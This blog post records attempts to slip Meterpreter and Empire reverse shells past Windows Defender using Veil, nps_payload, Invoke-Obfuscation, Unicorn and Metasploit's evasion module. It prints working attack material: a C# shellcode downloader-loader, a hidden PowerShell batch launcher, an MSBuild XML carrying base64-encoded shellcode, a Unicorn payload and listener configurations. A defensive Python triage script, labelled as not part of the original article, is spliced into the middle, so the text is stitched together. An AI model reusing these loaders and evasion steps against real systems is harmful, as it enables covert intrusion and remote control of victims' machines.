All This AV Bypassing Is Giving Me a Headache

I was recently tasked with deploying AV updates to a bunch of Windows machines in my corporate network, and around the same time someone had posed me a question asking something along the lines of what I did to get past Windows Defender. I’m not a red-teamer (though I think my alter-ego would certainly have me think I am) so it’s not something that I have had to deal with very often (other than some basic payload encryption with Metasploit for the OSCP). Assuming I couldn’t do something like Set-MpPreference -DisableRealtimeMonitoring $true with PowerShell or something similar to turn off AV, I realised this was a question I couldn’t answer with much certainty. It got me thinking about a few things. The first was whether our AV solution was fit for purpose, and more generally which AV vendors are more reliable. The second was to confirm whether Windows Defender is actually one of the better, if not the best, solutions around and if so, try to find a technique which got me a working remote shell to my target machine.

As per the usual disclaimers, this is by no means an exhaustive review of every single tool, every file-based and in-memory based technique, nor does it cover all the various payloads and encryption/obfuscation techniques available as that would simply not be feasible for the time frame I had. Here I am simply documenting the things I attempted which worked and didn't work. Hopefully it'll be of some use to people and I will be very happy to receive any comments on anything that is incomplete or not quite accurate. I also focus on getting shells back with Empire and Metasploit only. The solution below only works in a Windows environment with the .NET framework installed.

TL;DR: Yes Windows Defender is at the time of writing one of the better AV solutions around. A modified version of a modified version of nps_payload was the only thing I could get working which was not detected by a fully up-to-date Defender.

If you’re short on time and want something that works and you can use right now, go straight to end of this post. If by the time you read this, it no longer works then good luck finding an alternative!

The good thing about testing your payloads against Windows Defender is that it is free and widely deployed. If you’re able to bypass Defender then most likely you’ll get past other vendors too, and you don’t have to submit your payloads to VirusTotal or set up your own laborious AV testing environment, thus prolonging the shelf life of your payload. It’s easy, and I always prefer minimal effort for maximum impact.

Abundance in Choice™ Is Not Always a Good Thing


There’s a wealth of information out there on bypassing AV, and figuring out where to start or what to use is not straightforward. I don’t have the luxury of lots of dedicated time for researching the latest and greatest AV evasion techniques, so I’ve had to rely on things I’ve heard people mention or happen to have come across online. The things I’ve tried do not follow any logical sequence and are somewhat haphazard. I do have to mention a great resource that I reference a fair bit: ‘The Hacker Playbook 3 Red Team Edition’ (or the THP series generally). It has a ton of examples and provides a step-by-step guide on how to do things, or gives you enough information to look into a tool or technique if it's relevant to your needs. The only issue I have with it is that it doesn’t really provide a comparison of the effectiveness of the various tools.

Start Veil:

1. ./Veil.py

2. Type 'use 1' for Evasion

3. Type 'list' for list of available payloads

In my testing I tried two payloads:

4a. Use powershell/meterpreter/rev_https.py or 4b. Use cs/meterpreter/rev_https.py

5. Set the LHOST and LPORT as required.

6. Type 'generate'

This generates two files that are needed to run it, as well as the source code for the C# payload: an executable binary for the C# payload, and a batch file for the PowerShell payload, with the corresponding Metasploit resource file. The PowerShell batch file, which invokes powershell.exe, looks like this:

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"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\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"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\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")

The C# source code looks like this:

using System;
using System.Net;
using System.Net.Sockets;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;
namespace OYQwKIQMm {
 class bAfmNhaYDz {
  private static bool aSNAzprmhH(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert, System.Security.Cryptography.X509Certificates.X509Chain chain, System.Net.Security.SslPolicyErrors sslPolicyErrors) {
   return true;
  }
  static string vNMzuLlVnFLKLT(Random r, int s) {
   char[] UkEmEhsCRf = new char[s];
   string gZEuPlifGOKF = "xQ50p1uPRqJSwYezCDHEoWcGbUhlO7vt3ByTiZ462LXIMnk9V8mraKNgAFdsfj";
   for (int i = 0; i < s; i++) {
    UkEmEhsCRf[i] = gZEuPlifGOKF[r.Next(gZEuPlifGOKF.Length)];
   }
   return new string(UkEmEhsCRf);
  }
  static bool wIhMmCQMV(string s) {
   return ((s.ToCharArray().Select(x => (int) x).Sum()) % 0x100 == 92);
  }
  static string Mfcqftm(Random r) {
   string nJQOXtf = "";
   for (int i = 0; i < 64; ++i) {
    nJQOXtf = vNMzuLlVnFLKLT(r, 3);
    string YMQMFZIHHxfo = new string("T4tApq7ZxoVeaiQfSYB6nmPzwXjvL58c1g2dk0NEu3MCJUKIhWFObHsGyr9DlR".ToCharArray().OrderBy(s => (r.Next(2) % 2) == 0).ToArray());
    for (int j = 0; j < YMQMFZIHHxfo.Length; ++j) {
     string HXFZAEiGwyLuPHM = nJQOXtf + YMQMFZIHHxfo[j];
     if (wIhMmCQMV(HXFZAEiGwyLuPHM)) {
      return HXFZAEiGwyLuPHM;
     }
    }
   }
   return "9vXU";
  }
  static byte[] KhXFGUdsOMg(string XXKePMjiRgmj) {
   ServicePointManager.ServerCertificateValidationCallback = aSNAzprmhH;
   WebClient GGDQPcH = new System.Net.WebClient();
   GGDQPcH.Headers.Add("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");
   GGDQPcH.Headers.Add("Accept", "*/*");
   GGDQPcH.Headers.Add("Accept-Language", "en-gb,en;q=0.5");
   GGDQPcH.Headers.Add("Accept-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.7");
   byte[] vmswmkvjez = null;
   try {
    vmswmkvjez = GGDQPcH.DownloadData(XXKePMjiRgmj);
    if (vmswmkvjez.Length < 100000) return null;
   } catch (WebException) {}
   return vmswmkvjez;
  }
  static void JURjiWiNpl(byte[] zCslHHElCpxnEZ) {
   if (zCslHHElCpxnEZ != null) {
    UInt32 CjsjpH = VirtualAlloc(0, (UInt32) zCslHHElCpxnEZ.Length, 0x1000, 0x40);
    Marshal.Copy(zCslHHElCpxnEZ, 0, (IntPtr)(CjsjpH), zCslHHElCpxnEZ.Length);
    IntPtr GcepaerwSLQrkga = IntPtr.Zero;
    UInt32 NSUsDGl = 0;
    IntPtr QTkUWmZYXwlo = IntPtr.Zero;
    GcepaerwSLQrkga = CreateThread(0, 0, CjsjpH, QTkUWmZYXwlo, 0, ref NSUsDGl);
    WaitForSingleObject(GcepaerwSLQrkga, 0xFFFFFFFF);
   }
  }
  static void Main() {
   Random lwcsAmkXgrSU = new Random((int) DateTime.Now.Ticks);
   byte[] qmgIUVXoBc = KhXFGUdsOMg("https://127.0.0.1:443/" + Mfcqftm(lwcsAmkXgrSU));
   JURjiWiNpl(qmgIUVXoBc);
  }
  [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 SiQBawPaorIXvAX, UInt32 vkFugSDRAypZr, UInt32 NotUYbIY, UInt32 QSZLUQZT);
  [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 jMUkuC, UInt32 patCLISCIF, UInt32 mzdAYVdcGdf, IntPtr RexsWcjKjwIkb, UInt32 oqyYSocqrWazPz, ref UInt32 fEHvPFRDxg);
  [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr IqnViuRw, UInt32 QqBCUOOeqvf);
 }
}

I uploaded the C# executable and batch script to VirusTotal and was very surprised to find that 35/69 engines detected the C# payload and 26/59 had detected the batch script as being malicious:

C# executable:

PowerShell batch script:

This was not very good but at least our AV solution was detecting it! I didn't try any other payloads as I assumed that there'd be fairly similar results.

nps_payload - Attempt Number 1


At this point I decided to try one of the ‘no PowerShell’ techniques mentioned in THP3 using nps_payload, which you can find here: https://github.com/trustedsec/nps_payload. This tool uses one of the cool application whitelisting bypass techniques using msbuild and a malicious XML file (see https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/ for more information).

It is straightforward to install and get running. I generated a payload using the default options for a Windows Meterpreter Reverse HTTPS shell as shown below:

Copy the XML file to a location on the target and execute with the following command (note: it is not necessary to run with administrative privileges):

%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe [full filepath to xml file]

This does not work out of the box with Windows Defender running. I made a few small changes to the XML file by replacing references to nps with ‘test’ where I could, as shown below, and submitted it to VirusTotal to see how it fared.

The XML file below was only detected by two AV engines (3 with no modifications):

<Project ToolsVersion="4.0"
	xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml -->
	<!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
	<!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
	<!-- License: BSD 3-Clause -->
	<Target Name="test">
		<test />
	</Target>
	<UsingTask    TaskName="test"    TaskFactory="CodeTaskFactory"    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
		<Task>
			<Reference Include="System.Management.Automation" />
			<Code Type="Class" Language="cs">
				<![CDATA[using System; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using Microsoft.Build.Framework; using Microsoft.Build.Utilities; public class test: Task, ITask {
                    public override bool Execute() {
                        string cmd = "JG5GZ3BkV2JlID0gQCINCltEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXQ0KcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFZpcnR1YWxBbGxvYyhJbnRQdHIgbHBBZGRyZXNzLCB1aW50IGR3U2l6ZSwgdWludCBmbEFsbG9jYXRpb25UeXBlLCB1aW50IGZsUHJvdGVjdCk7DQpbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0NCnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBDcmVhdGVUaHJlYWQoSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywgdWludCBkd1N0YWNrU2l6ZSwgSW50UHRyIGxwU3RhcnRBZGRyZXNzLCBJbnRQdHIgbHBQYXJhbWV0ZXIsIHVpbnQgZHdDcmVhdGlvbkZsYWdzLCBJbnRQdHIgbHBUaHJlYWRJZCk7DQoiQA0KDQokYndSYXR2aGxpdk1lZFYgPSBBZGQtVHlwZSAtbWVtYmVyRGVmaW5pdGlvbiAkbkZncGRXYmUgLU5hbWUgIldpbjMyIiAtbmFtZXNwYWNlIFdpbjMyRnVuY3Rpb25zIC1wYXNzdGhydQ0KDQpbQnl0ZVtdXSAkY0VrWEFUeEtTbUdSU0RkID0gMHhmYywweGU4LDB4ODIsMHgwLDB4MCwweDAsMHg2MCwweDg5LDB4ZTUsMHgzMSwweGMwLDB4NjQsMHg4YiwweDUwLDB4MzAsMHg4YiwweDUyLDB4YywweDhiLDB4NTIsMHgxNCwweDhiLDB4NzIsMHgyOCwweGYsMHhiNywweDRhLDB4MjYsMHgzMSwweGZmLDB4YWMsMHgzYywweDYxLDB4N2MsMHgyLDB4MmMsMHgyMCwweGMxLDB4Y2YsMHhkLDB4MSwweGM3LDB4ZTIsMHhmMiwweDUyLDB4NTcsMHg4YiwweDUyLDB4MTAsMHg4YiwweDRhLDB4M2MsMHg4YiwweDRjLDB4MTEsMHg3OCwweGUzLDB4NDgsMHgxLDB4ZDEsMHg1MSwweDhiLDB4NTksMHgyMCwweDEsMHhkMywweDhiLDB4NDksMHgxOCwweGUzLDB4M2EsMHg0OSwweDhiLDB4MzQsMHg4YiwweDEsMHhkNiwweDMxLDB4ZmYsMHhhYywweGMxLDB4Y2YsMHhkLDB4MSwweGM3LDB4MzgsMHhlMCwweDc1LDB4ZjYsMHgzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTQsMHg1OCwweDhiLDB4NTgsMHgyNCwweDEsMHhkMywweDY2LDB4OGIsMHhjLDB4NGIsMHg4YiwweDU4LDB4MWMsMHgxLDB4ZDMsMHg4YiwweDQsMHg4YiwweDEsMHhkMCwweDg5LDB4NDQsMHgyNCwweDI0LDB4NWIsMHg1YiwweDYxLDB4NTksMHg1YSwweDUxLDB4ZmYsMHhlMCwweDVmLDB4NWYsMHg1YSwweDhiLDB4MTIsMHhlYiwweDhkLDB4NWQsMHg2OCwweDZlLDB4NjUsMHg3NCwweDAsMHg2OCwweDc3LDB4NjksMHg2ZSwweDY5LDB4NTQsMHg2OCwweDRjLDB4NzcsMHgyNiwweDcsMHhmZiwweGQ1LDB4MzEsMHhkYiwweDUzLDB4NTMsMHg1MywweDUzLDB4NTMsMHhlOCwweDNlLDB4MCwweDAsMHgwLDB4NGQsMHg2ZiwweDdhLDB4NjksMHg2YywweDZjLDB4NjEsMHgyZiwweDM1LDB4MmUsMHgzMCwweDIwLDB4MjgsMHg1NywweDY5LDB4NmUsMHg2NCwweDZmLDB4NzcsMHg3MywweDIwLDB4NGUsMHg1NCwweDIwLDB4MzYsMHgyZSwweDMxLDB4M2IsMHgyMCwweDU0LDB4NzIsMHg2OS
wweDY0LDB4NjUsMHg2ZSwweDc0LDB4MmYsMHgzNywweDJlLDB4MzAsMHgzYiwweDIwLDB4NzIsMHg3NiwweDNhLDB4MzEsMHgzMSwweDJlLDB4MzAsMHgyOSwweDIwLDB4NmMsMHg2OSwweDZiLDB4NjUsMHgyMCwweDQ3LDB4NjUsMHg2MywweDZiLDB4NmYsMHgwLDB4NjgsMHgzYSwweDU2LDB4NzksMHhhNywweGZmLDB4ZDUsMHg1MywweDUzLDB4NmEsMHgzLDB4NTMsMHg1MywweDY4LDB4YmIsMHgxLDB4MCwweDAsMHhlOCwweGUxLDB4MCwweDAsMHgwLDB4MmYsMHg0NCwweDcxLDB4NjMsMHg2MywweDYxLDB4NDMsMHg1NCwweDRlLDB4NWYsMHg2NywweDQ5LDB4NzIsMHg2OCwweDc5LDB4NzEsMHg0NywweDY0LDB4MmQsMHg1OCwweDMxLDB4NzcsMHg3NywweDZmLDB4MzksMHg2ZSwweDU0LDB4NWEsMHg3MywweDc5LDB4NWYsMHg1OCwweDcwLDB4NTEsMHg1OCwweDZhLDB4NDcsMHg0MiwweDZhLDB4NmMsMHg2ZCwweDZhLDB4NTMsMHg3MiwweDdhLDB4NTksMHg0NiwweDdhLDB4NzUsMHg2MywweDYxLDB4NGQsMHg1OCwweDZmLDB4NTcsMHg3MSwweDMxLDB4NzMsMHg3MSwweDU4LDB4NGMsMHg0NywweDc3LDB4NTksMHgzMSwweDcwLDB4NWEsMHg0ZSwweDZlLDB4NmYsMHg0YiwweDQzLDB4NmEsMHg0NCwweDYyLDB4NzcsMHg3NywweDUyLDB4NTMsMHg0YiwweDdhLDB4MCwweDUwLDB4NjgsMHg1NywweDg5LDB4OWYsMHhjNiwweGZmLDB4ZDUsMHg4OSwweGM2LDB4NTMsMHg2OCwweDAsMHgzMiwweGUwLDB4ODQsMHg1MywweDUzLDB4NTMsMHg1NywweDUzLDB4NTYsMHg2OCwweGViLDB4NTUsMHgyZSwweDNiLDB4ZmYsMHhkNSwweDk2LDB4NmEsMHhhLDB4NWYsMHg2OCwweDgwLDB4MzMsMHgwLDB4MCwweDg5LDB4ZTAsMHg2YSwweDQsMHg1MCwweDZhLDB4MWYsMHg1NiwweDY4LDB4NzUsMHg0NiwweDllLDB4ODYsMHhmZiwweGQ1LDB4NTMsMHg1MywweDUzLDB4NTMsMHg1NiwweDY4LDB4MmQsMHg2LDB4MTgsMHg3YiwweGZmLDB4ZDUsMHg4NSwweGMwLDB4NzUsMHgxNCwweDY4LDB4ODgsMHgxMywweDAsMHgwLDB4NjgsMHg0NCwweGYwLDB4MzUsMHhlMCwweGZmLDB4ZDUsMHg0ZiwweDc1LDB4Y2QsMHhlOCwweDRhLDB4MCwweDAsMHgwLDB4NmEsMHg0MCwweDY4LDB4MCwweDEwLDB4MCwweDAsMHg2OCwweDAsMHgwLDB4NDAsMHgwLDB4NTMsMHg2OCwweDU4LDB4YTQsMHg1MywweGU1LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg1MywweDg5LDB4ZTcsMHg1NywweDY4LDB4MCwweDIwLDB4MCwweDAsMHg1MywweDU2LDB4NjgsMHgxMiwweDk2LDB4ODksMHhlMiwweGZmLDB4ZDUsMHg4NSwweGMwLDB4NzQsMHhjZiwweDhiLDB4NywweDEsMHhjMywweDg1LDB4YzAsMHg3NSwweGU1LDB4NTgsMHhjMywweDVmLDB4ZTgsMHg2YiwweGZmLDB4ZmYsMHhmZiwweDMxLDB4MzgsMHgyZSwweDMxLDB4MzMsMHgzMCwweDJlLDB4MzEsMHgzMSwweDM1LDB4MmUsMHgzOSwweDMzLDB4MCwweGJiLDB4ZjAsMHhiNSwweGEyLDB4NTYsMHg2YSwweDAsMHg1MywweG
ZmLDB4ZDUNCg0KDQokelVodXFnSmkgPSAkYndSYXR2aGxpdk1lZFY6OlZpcnR1YWxBbGxvYygwLFtNYXRoXTo6TWF4KCRjRWtYQVR4S1NtR1JTRGQuTGVuZ3RoLDB4MTAwMCksMHgzMDAwLDB4NDApDQoNCltTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGNFa1hBVHhLU21HUlNEZCwwLCR6VWh1cWdKaSwkY0VrWEFUeEtTbUdSU0RkLkxlbmd0aCkNCg0KJGJ3UmF0dmhsaXZNZWRWOjpDcmVhdGVUaHJlYWQoMCwwLCR6VWh1cWdKaSwwLDAsMCkNCmZvciAoOzspewogIFN0YXJ0LXNsZWVwIDYwCn0=";
                        PowerShell ps = PowerShell.Create();
                        ps.AddScript(Base64Decode(cmd));
                        Collection < PSObject > output = null;
                        try {
                            output = ps.Invoke();
                        } catch (Exception e) {
                            Console.WriteLine("Error while executing the script.\r\n" + e.Message.ToString());
                        }
                        if (output != null) {
                            foreach(PSObject rtnItem in output) {
                                Console.WriteLine(rtnItem.ToString());
                            }
                        }
                        return true;
                    }
                    public static string Base64Encode(string text) {
                        return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
                    }
                    public static string Base64Decode(string encodedtext) {
                        return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
                    }
                }]]>
			</Code>
		</Task>
	</UsingTask>
</Project>
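Rather than executing a suspect project file to see what it does, a defender can triage it statically. The following is an added example written for this post (it is not code from nps_payload, from Veil or from the original article): it parses an MSBuild project, finds UsingTask elements backed by CodeTaskFactory, and reports which indicators the inline code carries. The indicator names and the two project documents it runs over are constructed here; a run of ‘Q’ characters stands in for a payload blob.

```python
"""Static triage of an MSBuild project file for inline CodeTaskFactory tasks.

Added example for defenders; not code from the post or from nps_payload.
It never runs the project: it parses the XML and reports which inline tasks
carry indicators (PowerShell hosting, runtime compilation, Base64 blobs,
unmanaged memory APIs) so an analyst can triage a .xml handed to msbuild.exe.
"""
import re
import xml.etree.ElementTree as ET

# Indicator labels are descriptive names chosen for this example, not a
# vendor taxonomy. A legitimate inline build task rarely needs any of them.
INDICATORS = {
    "powershell_hosting": r"System\.Management\.Automation|PowerShell\.Create\(",
    "runtime_compile": r"CSharpCodeProvider|CompileAssemblyFromSource",
    "base64_decode": r"FromBase64String",
    "unmanaged_memory": r"VirtualAlloc|CreateThread|Marshal\.Copy|DllImport",
    "large_base64_blob": r"[A-Za-z0-9+/]{200,}={0,2}",
}
# Any one of these alone is enough to call the file suspicious.
HIGH = {"powershell_hosting", "runtime_compile", "unmanaged_memory"}


def _local(tag):
    """Strip the '{namespace}' prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def find_inline_tasks(project_xml):
    """Return one record per UsingTask that compiles source at build time.

    Matching is on local tag names, so it covers both the xmlns form shown
    on the page and SDK-style projects that omit the namespace.
    """
    root = ET.fromstring(project_xml)
    records = []
    for task in root.iter():
        if _local(task.tag) != "UsingTask":
            continue
        factory = task.get("TaskFactory", "")
        if not factory.endswith("CodeTaskFactory"):
            continue
        # Scan the inline source plus any <Reference Include="..."/> names.
        text = " ".join(
            (node.text or "") if _local(node.tag) == "Code" else node.get("Include", "")
            for node in task.iter()
        )
        hits = sorted(name for name, pat in INDICATORS.items() if re.search(pat, text))
        records.append({"task": task.get("TaskName"), "factory": factory, "indicators": hits})
    return records


def triage(project_xml):
    """Collapse the records into one verdict: 'clean', 'review' or 'suspicious'."""
    records = find_inline_tasks(project_xml)
    if not records:
        return "clean"
    if any(HIGH & set(r["indicators"]) for r in records):
        return "suspicious"
    return "review"  # inline code in a project file deserves a look even with no hits


# Constructed samples, not files from the post. BENIGN_PROJECT is an ordinary
# inline task; LOADER_PROJECT mirrors the shape of the nps-style file above,
# with the payload replaced by a placeholder run of 'Q' characters.
BENIGN_PROJECT = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Hello"><SayHello /></Target>
  <UsingTask TaskName="SayHello" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task><Code Type="Fragment" Language="cs"><![CDATA[
      Log.LogMessage("build step ran");
    ]]></Code></Task>
  </UsingTask>
</Project>"""

LOADER_PROJECT = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="test"><test /></Target>
  <UsingTask TaskName="test" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs"><![CDATA[
        using System; using System.Management.Automation;
        public class test : Microsoft.Build.Utilities.Task {
          public override bool Execute() {
            string cmd = "PLACEHOLDER";
            PowerShell ps = PowerShell.Create();
            ps.AddScript(System.Text.Encoding.UTF8.GetString(Convert.FromBase64String(cmd)));
            ps.Invoke(); return true; } }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>""".replace("PLACEHOLDER", "Q" * 240)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_PROJECT), ("loader", LOADER_PROJECT)):
        print(name, triage(doc), find_inline_tasks(doc))
```

The verdict is deliberately coarse: any inline task is worth a glance because a project file that compiles code at build time is unusual outside of build servers, and the ‘suspicious’ indicators are the ones shared by every nps-style file on this page (hosting PowerShell, compiling a second assembly at runtime, or touching unmanaged memory). Renaming nps to test, as done above, does not change any of them.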

This is hardly the best sample but at this point I think it’s fair to say that Defender is actually quite good and if you’re able to get your payload past it then it’ll most likely be good with other AV engines. From here I focused on trying to find something that worked against Defender only. I’ll come back to nps_payload at the end but first I want to go over some of the other things I tried and failed.


Empire

It’s been a while since I’d used Empire and I’d never really tested it against AV so this part was interesting. I’d heard good things about Invoke-Obfuscation as a payload obfuscation tool and only after a bit of playing around did I realise that the latest version of Empire had the obfuscation part of Invoke-Obfuscation built into it – how cool is that?! If you’re familiar with Empire, in your launcher you just have to set the Obfuscate flag to ‘True’ and either use the default ObfuscateCommand or enter your own custom command. If you’re not familiar with Invoke-Obfuscation then you’d need to play around with the various obfuscation methods to find out what valid ObfuscateCommands are. Here’s a handy tutorial to get you started with Invoke-Obfuscation https://www.helloitsliam.com/2018/03/21/invoke-obfuscation so I won’t cover how to use it in detail.

I won’t show evidence for all the things I tested, but unfortunately none of the Empire launchers, with or without obfuscation, could get past Defender. The way I did this was as follows:

1. Download and follow instructions here to install Empire https://github.com/EmpireProject/Empire.

2. Setup a listener (in this instance I used the http listener).

3. Generate the stager code in Empire and set the Obfuscate flag to true. In this example I used the ‘multi/launcher’ stager with the default ObfuscateCommand. Copy and paste the generated launcher code in a command prompt and as you can see below it works fine without AV.

However, when I turned Defender on it no longer worked. I did however upload this command as a file to VirusTotal and no AV engines flagged this as malicious. The launcher did work against our corporate AV however, so whilst it may not be effective against Defender it is likely this command will get past most AV engines so definitely worth trying out for yourself on engagements.


Invoke-Obfuscation

Rather than use Empire to generate and test payloads it’s much easier to do this directly in Invoke-Obfuscation. Using the Empire-generated payload above I tried the following, but none of the various obfuscation options could get past Defender.

1. Generate the Empire stager without any obfuscation.

2. Start invoke-obfuscation which I did as follows.

Run the script (or import the module) and start Invoke-Obfuscation

.\Invoke-Obfuscation.ps1


3. Set the scriptblock to the stager code generated from Empire:

set scriptblock powershell -noP -sta -w 1 -enc  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


4. As an example I have shown the compression method below:

A note on usage, you can apply various rounds of obfuscation and also obfuscate the launcher at the end. If you encounter any problems at any stage you can ‘undo’ the last one that you applied which is really handy. Instead of setting the scriptblock you can set a scriptpath to point to an externally hosted PowerShell script for example. Once you’re done with the obfuscation you can test or run directly from the tool by typing ‘test’ or ‘execute’. At any point you can type ‘show options’ to see what obfuscation or other settings you have in place.

I however prefer to copy and paste the command into a separate PowerShell session to avoid having to go through the whole process of starting the tool. As you can see below this payload was blocked by Defender:

5. I tried various obfuscation techniques shown below (not shown are those obfuscation rounds that resulted in a command that exceeded the maximum length of 8190).

# compress\1
# 3 rounds of compress\1
# 5 rounds of compress\1
# compress\1 and Launcher\Mshta++\1234567
# compress\1 and Launcher\rundll++\1234567
# compress\1 and Launcher\wmic\1234567
# compress\1 and Launcher\clip\1234567
# compress\1 and Launcher\var\1234567

None worked. However, when I uploaded a file containing the malicious launcher code to VirusTotal no AV engines flagged it as malicious. I guess Defender is doing some clever run-time checking to detect the malicious activity. The 4th combination above did get past our corporate AV, so it is likely that this technique will bypass most AV engines.


Unicorn

Not having much luck with finding something that worked (I thought it was going to be easy, how wrong I was), a colleague suggested giving Unicorn a try since it had always worked for him onsite. At the time of writing I used version 3.6.10 which you can download from here https://github.com/trustedsec/unicorn. Unicorn ‘is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory’ so I was hopeful.

I generated the standard Meterpreter Reverse HTTPS shell as follows:

python unicorn.py windows/meterpreter/reverse_https <ip> 443


Set up the listener with the unicorn.rc file:

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <IP>
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
exploit -j


Payload:

powershell /w 1 /C "s''v xVY -;s''v az e''c;s''v lK ((g''v xVY).value.toString()+(g''v az).value.toString());powershell (g''v lK).value.toString() ('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'+'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')"


I uploaded the generated powershell_attack.txt file to VirusTotal. It was flagged as malicious by 10 engines, interestingly not by Defender. I had varying effects when executing the payload in a command prompt. Initially, I could get a reverse shell, but Defender popped up an alert for malicious activity and the shell was unusable. On other occasions a reverse connection could not be established but Defender would not pop up with an alert message to suggest any action had been taken.

I attempted several methods of obfuscation with invoke-obfuscation some of which are shown below but nothing worked or the length was too long! I didn’t try every permutation but it looked unlikely to get past Defender.

# compress\1
# compress\1, token\all\1
# compress\1, token\all\1,Launcher\RunDll++\3457
# 2 and 3 rounds of  compress\1, token\all\1
# 3 rounds of  compress\1, token\all\1 and Launcher\Mshta++\23467
# compress\1, encoding\5  - for AES encryption (all other encoding options generated a payload that exceeded the allowed length)

Metasploit 5

One of the new features of Metasploit 5 is the evasion module. More information can be found here: https://github.com/rapid7/metasploit-framework/pull/10759. There are two example modules. The Windows executable example (/usr/share/metasploit-framework/modules/evasion/windows/windows_defender_exe.rb), according to the developer’s notes, ‘generates an EXE that utilizes these techniques: shellcode encryption, code randomization, and a little anti-emulation’.

When used with the default rc4 encryption and windows/meterpreter/reverse_https payload it was at the time of writing detected by 35/70 AV engines. I didn’t look into this any further but perhaps other encryption techniques might have a better result.

You can list the encryption methods as follows:

# msfvenom --list encrypt
Framework Encryption Formats [--encrypt <value>]
================================================
    Name
    ----
    aes256
    base64
    rc4
    xor


Basic usage:

# use evasion/windows/windows_defender_exe
# set payload windows/meterpreter/reverse_https
# set LHOST and LPORT
# run

// Setup your listener
# handler -p windows/meterpreter/reverse_https -H 0.0.0.0 -P 443

VirusTotal Output

What did work – nps_payload - Attempt Number 2


Having tried and failed using the aforementioned tools, I finally found a method that got past Windows Defender. Initially, I found a website which dealt specifically with bypassing Defender here: https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus-part-2/. The site lists 3 ways using some variant of the nps_payload mentioned previously. I tried the first two but at the time of writing neither worked against Defender. The third method mentions the use of a forked version of nps_payload but doesn’t actually go on to say how to get it to work. The forked version can be found here https://github.com/fsacer/nps_payload but when using it out of the box gets detected by Defender. I decided to look into this a bit more and found that it was possible to bypass Defender using this tool but some manual modification of the source code was required. What was interesting is that the custom XOR-based encryption applied to the raw payload was not being picked up by Defender. Instead all it took to get past Defender was to modify the using directives in the C# payload using the steps below:

Install the tool and select option 2 to generate the C# payload:

From the msbuild_nps.xml file extract and Base64 decode the payload as shown highlighted below:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">  
  <!-- This inline task executes c# code. -->  
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml -->  
  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->  
  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->  
  <!-- Created C# payload: Franci Sacer, Twitter: @francisacer1 -->  
  <!-- License: BSD 3-Clause -->  
  <Target Name="npscsharp">   
    <nps />  
  </Target>  
  <UsingTask    TaskName="nps"    TaskFactory="CodeTaskFactory"    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >  
    <Task>      
      <Code Type="Class" Language="cs">        
        <![CDATA[using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using Microsoft.Build.Framework; using Microsoft.Build.Utilities; using Microsoft.CSharp; using System.CodeDom.Compiler; using System.Reflection; public class nps: Task, ITask {
          public override bool Execute() {
              Console.WriteLine("hey");
              string cmd = "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";
